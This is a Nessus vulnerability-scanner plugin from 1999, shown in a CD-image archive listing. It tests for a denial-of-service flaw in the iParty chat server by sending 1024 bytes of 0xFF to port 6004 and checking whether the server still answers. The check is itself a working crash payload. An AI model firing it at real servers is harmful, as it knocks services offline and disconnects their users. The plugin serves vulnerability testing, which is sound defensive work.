home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / iParty.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  73 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10111);
  10.  script_bugtraq_id(6844);
  11.  script_cve_id("CAN-1999-1566");
  12.  script_version ("$Revision: 1.14 $");
  13.  name["english"] = "iParty";
  14.  name["francais"] = "iParty";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "iParty is an audio/text chat program for Windows.
  18. The iParty server listens on port 6004 for client requests. If someone
  19. connects to it and sends a large amount of ASCII 255 chars, the server
  20. will close itself and disconnect all the current users.
  21.  
  22. Risk factor : Low / Medium
  23.  
  24. Solution : Upgrade";
  25.  
  26.  desc["francais"] = "iParty est un programme de chat avec audio et texte 
  27. pour Windows. Le serveur Θcoute sur le port 6004 en attente des requΩtes
  28. des clients. Si quelqu'un si connecte et envoie un grand nombre de
  29. caractΦres ASCII 255, alors le serveur va se fermer et couper toutes
  30. les connections actives.
  31.  
  32. Facteur de risque : Faible/Moyen.
  33.  
  34. Solution : Mettez-le α jour";
  35.  
  36.  
  37.  script_description(english:desc["english"], francais:desc["francais"]);
  38.  
  39.  summary["english"] = "Shuts down a iParty server";
  40.  summary["francais"] = "Coupe un serveur iParty";
  41.  script_summary(english:summary["english"], francais:summary["francais"]);
  42.  
  43.  script_category(ACT_DENIAL);
  44.  
  45.  
  46.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  47.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  48.  family["english"] = "Denial of Service";
  49.  family["francais"] = "DΘni de service";
  50.  script_family(english:family["english"], francais:family["francais"]);
  51.  script_require_ports(6004);
  52.  exit(0);
  53. }
  54.  
  55. #
  56. # The script code starts here
  57. #
  58.  
  59. if(get_port_state(6004))
  60. {
  61.  soc = open_sock_tcp(6004);
  62.  if(soc)
  63.  {
  64.   asc = raw_string(0xFF);
  65.   data = crap(data:asc, length:1024);
  66.   send(socket:soc, data:data);
  67.   close(soc);
  68.   soc2 = open_sock_tcp(6004);
  69.   if(!soc2)security_warning(6004);
  70.   else close(soc2);
  71.  }
  72. }
  73.